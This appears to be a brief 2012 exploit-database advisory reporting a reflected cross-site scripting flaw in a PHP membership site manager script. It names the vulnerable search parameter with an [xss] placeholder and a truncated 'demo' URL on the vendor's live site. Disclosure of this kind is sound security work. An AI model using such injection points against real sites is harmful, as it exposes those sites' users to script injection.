############################################################################ # # Exploit Title: PHP Membership Site Manager Script # Date: 14/01/2012 # Author: Atmon3r # Discovered By: Atmon3r # Software Link: http://www.e-soft24.com/php-membership-site-manager-script-p-74.html # Version: All Version # Security Risk:: Low # Tested on: GNU/Linux Ubuntu # ############################################################################ # # Exploit: # http://www.website.com/[path]/scripts/membershipsite/manager/index.php?action=search&key=[xss] # ############################################################################ # # Demo: # http://www.e-soft24.com/scripts/membershipsite/manager/index.php?action=search&key="> # ############################################################################